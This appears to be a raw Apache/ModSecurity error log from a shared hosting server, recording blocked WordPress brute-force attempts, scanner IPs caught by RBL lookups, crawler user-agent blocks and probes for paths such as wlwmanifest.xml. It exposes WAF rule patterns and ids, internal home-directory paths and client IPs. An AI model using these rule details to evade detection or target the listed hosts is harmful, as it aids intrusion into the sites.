[Tue May 26 13:43:15.562939 2026] [security2:error] [pid 536875:tid 537108] [client 34.75.119.88:49301] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVWG-r_-FTveSGlx1H19QAAAOw"]
[Tue May 26 13:43:15.849791 2026] [security2:error] [pid 536875:tid 537116] [client 34.75.119.88:61136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVWG-r_-FTveSGlx1H19wAAAPQ"]
[Tue May 26 13:43:16.111731 2026] [core:crit] [pid 536875:tid 537104] (13)Permission denied: [client 40.77.167.132:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:16.298992 2026] [security2:error] [pid 536875:tid 537025] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWG-r_-FTveSGlx1H1-AAAAJk"]
[Tue May 26 13:43:16.396097 2026] [core:crit] [pid 536875:tid 537016] (13)Permission denied: [client 40.77.167.132:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:16.640548 2026] [security2:error] [pid 536875:tid 537090] [client 43.165.197.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahVWHOr_-FTveSGlx1H2BgAAANo"]
[Tue May 26 13:43:18.506618 2026] [core:error] [pid 544395:tid 544633] [client 198.235.24.128:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:43:18.506659 2026] [core:error] [pid 544395:tid 544633] [client 198.235.24.128:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:43:18.681850 2026] [security2:error] [pid 544395:tid 544560] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWHhmrs7g3RMCdp8XZ4AAAACM"]
[Tue May 26 13:43:18.942282 2026] [security2:error] [pid 544395:tid 544635] [client 136.243.228.198:57462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/partners.php"] [unique_id "ahVWHhmrs7g3RMCdp8XZ8wAAAG4"]
[Tue May 26 13:43:18.990955 2026] [security2:error] [pid 536875:tid 537083] [client 129.222.147.134:36464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWHur_-FTveSGlx1H2NgAAANM"]
[Tue May 26 13:43:18.998438 2026] [security2:error] [pid 536875:tid 537083] [client 129.222.147.134:36464] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWHur_-FTveSGlx1H2NgAAANM"]
[Tue May 26 13:43:19.788777 2026] [security2:error] [pid 544395:tid 544632] [client 104.234.53.183:57009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 183.53.234.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-login.php"] [unique_id "ahVWHxmrs7g3RMCdp8XZ9gAAAGs"], referer: https://www.facebook.com/
[Tue May 26 13:43:20.579018 2026] [security2:error] [pid 536875:tid 537064] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWIOr_-FTveSGlx1H2TQAAAMA"]
[Tue May 26 13:43:21.320836 2026] [core:crit] [pid 544395:tid 544530] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:21.416432 2026] [security2:error] [pid 536875:tid 537035] [client 106.192.248.115:52504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWIer_-FTveSGlx1H2XgAAAKM"]
[Tue May 26 13:43:21.416569 2026] [security2:error] [pid 536875:tid 537035] [client 106.192.248.115:52504] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWIer_-FTveSGlx1H2XgAAAKM"]
[Tue May 26 13:43:21.464277 2026] [security2:error] [pid 544395:tid 544401] [remote 103.95.119.103:44172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVWIRmrs7g3RMCdp8XaGwAAIwU"]
[Tue May 26 13:43:22.235219 2026] [security2:error] [pid 544395:tid 544645] [client 104.234.53.149:28541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.53.234.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-login.php"] [unique_id "ahVWIhmrs7g3RMCdp8XaNQAAAHg"], referer: https://www.facebook.com/
[Tue May 26 13:43:22.517682 2026] [security2:error] [pid 544395:tid 544631] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWIhmrs7g3RMCdp8XaOgAAAGo"]
[Tue May 26 13:43:22.526157 2026] [security2:error] [pid 544395:tid 544581] [client 136.243.228.198:9233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/services.php"] [unique_id "ahVWIhmrs7g3RMCdp8XaRwAAADg"]
[Tue May 26 13:43:24.900210 2026] [security2:error] [pid 536875:tid 537122] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWJOr_-FTveSGlx1H2egAAAPo"]
[Tue May 26 13:43:25.242586 2026] [security2:error] [pid 536875:tid 536945] [remote 49.12.3.147:56076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVWJer_-FTveSGlx1H2gwAApUU"]
[Tue May 26 13:43:26.313352 2026] [security2:error] [pid 544395:tid 544579] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWJRmrs7g3RMCdp8XadQAAADY"]
[Tue May 26 13:43:27.323612 2026] [security2:error] [pid 544395:tid 544594] [client 136.243.228.198:21979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVWJxmrs7g3RMCdp8XalwAAAEU"]
[Tue May 26 13:43:28.124961 2026] [security2:error] [pid 544395:tid 544580] [client 104.234.53.147:57295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.53.234.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-login.php"] [unique_id "ahVWJxmrs7g3RMCdp8XaqQAAADc"], referer: https://www.google.com/
[Tue May 26 13:43:28.302739 2026] [security2:error] [pid 544395:tid 544583] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWJxmrs7g3RMCdp8XarAAAADo"]
[Tue May 26 13:43:29.320774 2026] [security2:error] [pid 544395:tid 544646] [client 129.222.147.134:17529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWKRmrs7g3RMCdp8XaxAAAAHk"]
[Tue May 26 13:43:29.320939 2026] [security2:error] [pid 544395:tid 544646] [client 129.222.147.134:17529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWKRmrs7g3RMCdp8XaxAAAAHk"]
[Tue May 26 13:43:30.339463 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWKRmrs7g3RMCdp8XazgAAACw"]
[Tue May 26 13:43:32.002378 2026] [security2:error] [pid 536875:tid 537104] [client 106.192.248.115:52829] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWLOr_-FTveSGlx1H3BwAAAOg"]
[Tue May 26 13:43:32.002565 2026] [security2:error] [pid 536875:tid 537104] [client 106.192.248.115:52829] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWLOr_-FTveSGlx1H3BwAAAOg"]
[Tue May 26 13:43:32.110992 2026] [security2:error] [pid 536875:tid 537076] [client 170.78.193.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWK-r_-FTveSGlx1H2_gAAAMw"]
[Tue May 26 13:43:32.260183 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWK-r_-FTveSGlx1H3BAAAAOo"]
[Tue May 26 13:43:32.468414 2026] [security2:error] [pid 536875:tid 537107] [client 85.208.96.205:49436] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVWLOr_-FTveSGlx1H3DgAAAOs"]
[Tue May 26 13:43:32.468504 2026] [security2:error] [pid 536875:tid 537107] [client 85.208.96.205:49436] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVWLOr_-FTveSGlx1H3DgAAAOs"]
[Tue May 26 13:43:32.691796 2026] [security2:error] [pid 544395:tid 544438] [remote 172.194.139.254:14347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVWLBmrs7g3RMCdp8Xa9AAAeCo"]
[Tue May 26 13:43:34.069557 2026] [security2:error] [pid 544395:tid 544588] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWLRmrs7g3RMCdp8XbDAAAAD8"]
[Tue May 26 13:43:35.502991 2026] [security2:error] [pid 544395:tid 544650] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWLxmrs7g3RMCdp8XbHgAAAH0"]
[Tue May 26 13:43:36.361163 2026] [security2:error] [pid 536875:tid 537080] [client 85.208.96.206:28710] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/list/"] [unique_id "ahVWMOr_-FTveSGlx1H3OAAAANA"]
[Tue May 26 13:43:36.361279 2026] [security2:error] [pid 536875:tid 537080] [client 85.208.96.206:28710] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/list/"] [unique_id "ahVWMOr_-FTveSGlx1H3OAAAANA"]
[Tue May 26 13:43:36.408218 2026] [security2:error] [pid 544395:tid 544448] [remote 74.7.241.58:52588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVWMBmrs7g3RMCdp8XbMQAAGDQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 13:43:37.787848 2026] [security2:error] [pid 536875:tid 537095] [client 193.58.104.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVWMer_-FTveSGlx1H3SgAAAN8"], referer: https://www.anujtradingco.com/
[Tue May 26 13:43:37.908796 2026] [security2:error] [pid 536875:tid 537006] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWMer_-FTveSGlx1H3RQAAAIY"]
[Tue May 26 13:43:38.727310 2026] [security2:error] [pid 544395:tid 544607] [client 193.58.104.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVWMhmrs7g3RMCdp8XbTQAAAFI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1224629&moderation-hash=80c3f33234fb0ed4f5b5fe76d932cc1f
[Tue May 26 13:43:39.351823 2026] [security2:error] [pid 536875:tid 537051] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWMur_-FTveSGlx1H3WAAAALM"]
[Tue May 26 13:43:39.591133 2026] [security2:error] [pid 536875:tid 536882] [remote 170.187.230.30:47554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.230.187.170.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVWM-r_-FTveSGlx1H3awAA1QY"]
[Tue May 26 13:43:39.601051 2026] [autoindex:error] [pid 544395:tid 544652] [client 20.17.160.149:49444] AH01276: Cannot serve directory /home2/debatqhn/tedxnutm.org.ng/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:43:39.700872 2026] [security2:error] [pid 536875:tid 537044] [client 107.150.120.129:50389] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "training.mosykay.com"] [uri "/"] [unique_id "ahVWM-r_-FTveSGlx1H3dAAAAKw"]
[Tue May 26 13:43:39.722571 2026] [security2:error] [pid 536875:tid 537031] [client 129.222.147.134:2370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWM-r_-FTveSGlx1H3bwAAAJ8"]
[Tue May 26 13:43:39.722711 2026] [security2:error] [pid 536875:tid 537031] [client 129.222.147.134:2370] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWM-r_-FTveSGlx1H3bwAAAJ8"]
[Tue May 26 13:43:39.754928 2026] [security2:error] [pid 536875:tid 536877] [remote 88.198.91.116:36780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVWM-r_-FTveSGlx1H3cAAA-AE"]
[Tue May 26 13:43:42.037576 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWNRmrs7g3RMCdp8XbfAAAACw"]
[Tue May 26 13:43:42.570879 2026] [security2:error] [pid 544395:tid 544615] [client 106.192.248.115:53134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWNhmrs7g3RMCdp8XbjQAAAFo"]
[Tue May 26 13:43:42.571046 2026] [security2:error] [pid 544395:tid 544615] [client 106.192.248.115:53134] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWNhmrs7g3RMCdp8XbjQAAAFo"]
[Tue May 26 13:43:43.659127 2026] [security2:error] [pid 544395:tid 544638] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWNxmrs7g3RMCdp8XbjwAAAHE"]
[Tue May 26 13:43:44.963866 2026] [security2:error] [pid 536875:tid 537025] [client 193.58.104.9:54515] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVWOOr_-FTveSGlx1H3vAAAAJk"], referer: https://anujtradingco.com
[Tue May 26 13:43:45.722657 2026] [security2:error] [pid 544395:tid 544558] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWORmrs7g3RMCdp8XbswAAACE"]
[Tue May 26 13:43:47.754324 2026] [security2:error] [pid 536875:tid 537124] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWO-r_-FTveSGlx1H36gAAAPw"]
[Tue May 26 13:43:48.792938 2026] [security2:error] [pid 544395:tid 544595] [client 167.99.12.84:53522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVWPBmrs7g3RMCdp8Xb2wAAAEY"]
[Tue May 26 13:43:49.741876 2026] [security2:error] [pid 544395:tid 544577] [client 129.222.147.134:23569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWPRmrs7g3RMCdp8Xb7gAAADQ"]
[Tue May 26 13:43:49.741970 2026] [security2:error] [pid 544395:tid 544577] [client 129.222.147.134:23569] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWPRmrs7g3RMCdp8Xb7gAAADQ"]
[Tue May 26 13:43:50.852641 2026] [security2:error] [pid 544395:tid 544601] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWPhmrs7g3RMCdp8Xb-wAAAEw"]
[Tue May 26 13:43:52.787556 2026] [security2:error] [pid 544395:tid 544637] [client 106.192.248.115:53150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWQBmrs7g3RMCdp8XcIwAAAHA"]
[Tue May 26 13:43:52.787703 2026] [security2:error] [pid 544395:tid 544637] [client 106.192.248.115:53150] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWQBmrs7g3RMCdp8XcIwAAAHA"]
